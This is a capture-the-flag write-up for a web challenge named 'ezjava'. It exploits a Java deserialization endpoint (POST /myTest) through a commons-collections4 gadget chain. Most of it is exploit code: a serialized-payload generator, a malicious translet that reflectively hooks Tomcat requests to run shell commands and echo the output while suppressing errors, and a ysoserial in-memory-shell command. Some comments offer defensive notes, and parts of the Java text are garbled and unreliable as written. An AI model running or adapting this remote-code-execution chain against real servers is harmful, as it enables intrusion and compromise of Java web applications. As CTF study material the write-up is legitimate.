
0x01 web

1.ezjava

Download the source, decompile the jar, and find that POST /myTest has a deserialization vulnerability. https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210302033773.png

The util class turns out to be irrelevant in the end.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210302034773.png

Inspecting the program shows that it ships Apache commons-collections4, and its deserialization gadget classes have not been patched.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210302034341.png

commons-collections4-4.0 was visible at a glance, so I used ysoserial against it directly.

Testing confirmed that it is CC4.

Attached article

Plus ready-made PoCs for spring-ech are available on the Internet.

Reinventing the wheel:

package moe.orangemc;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;

import javassist.ClassPool;

import javassist.CtClass;

import org.apache.commons.collections4.Transformer;

import org.apache.commons.collections4.comparators.TransformingComparator;

import org.apache.commons.collections4.functors.ChainedTransformer;

import org.apache.commons.collections4.functors.ConstantTransformer;

import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;

import java.io.ByteArrayInputStream;

import java.io.ByteArrayOutputStream;

import java.io.ObjectInputStream;

import java.io.ObjectOutputStream;

import java.lang.reflect.Field;

import java.util.Base64;

import java.util.PriorityQueue;

public class Main {

/**
 * Builds a serialized {@code java.util.PriorityQueue} carrying the
 * commons-collections4 gadget chain and prints it base64-encoded.
 *
 * <p>Nothing is executed here; the chain only fires when the receiving side
 * calls {@code ObjectInputStream.readObject} on this blob, which is why the
 * endpoint discussed above (POST /myTest, commons-collections4-4.0 on the
 * classpath) is the real risk. Defender's takeaways: never deserialize
 * request bodies with Java native serialization, register a
 * {@code java.io.ObjectInputFilter} that rejects the commons-collections4
 * functor classes and {@code TemplatesImpl}, and move commons-collections4
 * past 4.0 (later releases refuse to deserialize these functors by default).
 *
 * @param args unused
 */
public static void main(String[] args) {
    try {
        // Attacker-controlled bytecode (the Meow translet defined further down) is
        // read via javassist and stuffed into TemplatesImpl through reflection;
        // the private fields _name/_bytecodes are what a filter should look for.
        ClassPool classPool=ClassPool.getDefault();
        CtClass ctClass=classPool.getCtClass('Meow');
        byte[] bytes=ctClass.toBytecode();
        TemplatesImpl templates=new TemplatesImpl();
        Field f1=templates.getClass().getDeclaredField('_name');
        Field f2=templates.getClass().getDeclaredField('_bytecodes');
        f1.setAccessible(true);
        f2.setAccessible(true);
        f1.set(templates, 'Meow');
        f2.set(templates, new byte[][]{bytes});
        // Gadget chain: ConstantTransformer -> InstantiateTransformer(TrAXFilter, templates).
        // TrAXFilter's constructor is the point where TemplatesImpl is instantiated.
        TransformerClass? Object chainedTransformer=new ChainedTransformer(new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates}));
        TransformingComparatorClass? Object transformingComparator=new TransformingComparator(chainedTransformer);
        // PriorityQueue re-heapifies on readObject and invokes its comparator, which
        // is the deserialization entry point; the comparator is injected reflectively
        // after construction so the queue is built without triggering it locally.
        PriorityQueueInteger queue=new PriorityQueue(2);
        queue.add(1);
        queue.add(1);
        Field f=queue.getClass().getDeclaredField('comparator');
        f.setAccessible(true);
        f.set(queue, transformingComparator);
        Field f3=queue.getClass().getDeclaredField('queue');
        f3.setAccessible(true);
        f3.set(queue, new Object[] {chainedTransformer, chainedTransformer});
        // Serialize and print; the raw stream starts with the Java serialization
        // magic (AC ED 00 05 before base64), a cheap network/WAF detection signal.
        ByteArrayOutputStream baos=new ByteArrayOutputStream();
        ObjectOutputStream oos=new ObjectOutputStream(baos);
        oos.writeObject(queue);
        oos.close();
        String result=new String(Base64.getEncoder().encode(baos.toByteArray()));
        System.out.println(result);
    } catch (Exception e) {
        e.printStackTrace();
    }
}

} With the code above there is no output echo, but according to Baidu the output can be echoed through Apache Catalina. This class library is also included in the package.

1049983-20221102172147791-1876168569.png

Write malicious classes:

import com.sun.org.apache.xalan.internal.xsltc.DOM;

import com.sun.org.apache.xalan.internal.xsltc.TransletException;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;

import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

/**
 * Malicious translet whose constructor runs when {@code TemplatesImpl}
 * instantiates the injected bytecode during deserialization.
 *
 * <p>The constructor walks Tomcat internals by reflection (Catalina context ->
 * StandardService -> Connector -> ProtocolHandler -> RequestGroupInfo) to reach
 * an in-flight {@code org.apache.catalina.connector.Request}, runs a shell
 * command and writes its first line into that request's response. Everything
 * is wrapped in a catch-all that swallows failures, so a blocked step leaves no
 * trace in the application log.
 *
 * <p>Detection/mitigation notes: a child process (`sh -c` / `cmd.exe /c`)
 * spawned by the Tomcat JVM from a readObject call stack, reflective access to
 * {@code org.apache.coyote}/{@code org.apache.catalina} internals from
 * application code, and an AbstractTranslet subclass loaded from a
 * {@code TemplatesImpl} are all strong indicators. A JVM-level
 * {@code ObjectInputFilter} and a non-serializing request format remove the
 * entry point entirely.
 */
public class Meow extends AbstractTranslet {
    public Meow() {
        super();
        this.namesArray=new String[]{'meow'};
        try {
            // Private Tomcat fields/methods opened up reflectively.
            java.lang.reflect.Field contextField=org.apache.catalina.core.StandardContext.class.getDeclaredField('context');
            java.lang.reflect.Field serviceField=org.apache.catalina.core.ApplicationContext.class.getDeclaredField('service');
            java.lang.reflect.Field requestField=org.apache.coyote.RequestInfo.class.getDeclaredField('req');
            java.lang.reflect.Method getHandlerMethod=org.apache.coyote.AbstractProtocol.class.getDeclaredMethod('getHandler',null);
            contextField.setAccessible(true);
            serviceField.setAccessible(true);
            requestField.setAccessible(true);
            getHandlerMethod.setAccessible(true);
            // Starts from the webapp class loader of the current thread to find the context.
            org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase=
                (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            org.apache.catalina.core.ApplicationContext applicationContext=(org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
            org.apache.catalina.core.StandardService standardService=(org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
            org.apache.catalina.connector.Connector[] connectors=standardService.findConnectors();
            for (int i=0;iconnectors.length;i++) {
                // Scheme of length 4 ("http") selects the HTTP connector.
                if (4==connectors[i].getScheme().length()) {
                    org.apache.coyote.ProtocolHandler protocolHandler=connectors[i].getProtocolHandler();
                    if (protocolHandler instance of org.apache.coyote.http11.AbstractHttp11Protocol) {
                        // Inner classes of AbstractProtocol are matched by name length only;
                        // this is a brittle fingerprint tied to specific Tomcat builds.
                        Class[] classes=org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
                        for (int j=0; j classes.length; j++) {
                            if (52==(classes[j].getName().length())||60==(classes[j].getName().length())) {
                                System.out.println(classes[j].getName());
                                java.lang.reflect.Field globalField=classes[j].getDeclaredField('global');
                                java.lang.reflect.Field processorsField=org.apache.coyote.RequestGroupInfo.class.getDeclaredField('processors');
                                globalField.setAccessible(true);
                                processorsField.setAccessible(true);
                                org.apache.coyote.RequestGroupInfo requestGroupInfo=(org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler,null));
                                java.util.List list=(java.util.List) processorsField.get(requestGroupInfo);
                                for (int k=0; k list.size(); k++) {
                                    org.apache.coyote.Request tempRequest=(org.apache.coyote.Request) requestField.get(list.get(k));
                                    System.out.println(tempRequest.getHeader('tomcat'));
                                    org.apache.catalina.connector.Request request=(org.apache.catalina.connector.Request) tempRequest.getNote(1);
                                    // Command execution sink: Runtime.exec from a deserialization stack.
                                    String cmd='' + 'cat /flag' +'';
                                    String[] cmds=!System.getProperty('os.name').toLowerCase().contains('win') ? new String[]{'sh', '-c', cmd} : new String[]{'cmd.exe', '/c', cmd};
                                    java.io.InputStream in=Runtime.getRuntime().exec(cmds).getInputStream();
                                    java.util.Scanner s=new java.util.Scanner(in).useDelimiter('\n');
                                    // Only the first line of output is captured.
                                    String output=s.hasNext() ? s.next() : '';
                                    // usingWriter is reset so the response can still be written to.
                                    java.io.Writer writer=request.getResponse().getWriter();
                                    java.lang.reflect.Field usingWriter=request.getResponse().getClass().getDeclaredField('usingWriter');
                                    usingWriter.setAccessible(true);
                                    usingWriter.set(request.getResponse(), Boolean.FALSE);
                                    writer.write(output);
                                    writer.flush();
                                    break;
                                }
                                break;
                            }
                        }
                    }
                    break;
                }
            }
        } catch (Exception e) {
            // Deliberately silent: any failure in the chain leaves no log entry.
        }
    }

    /** Required by AbstractTranslet; intentionally a no-op. */
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    /** Required by AbstractTranslet; intentionally a no-op. */
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

After searching around, I found Y4er's modified version of ysoserial:

https://github.com/Y4er/ysoserial

Try CC4 combined with the TomcatCmdEcho in-memory shell ("memory horse"):

java -jar ysoserial-main-1736fa42da-1.jar CommonsCollections4 'CLASS:TomcatCmdEcho' | base64

When sending the request, delete the Content-Type header.

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202210302045474.png

The command executed successfully on the second send.
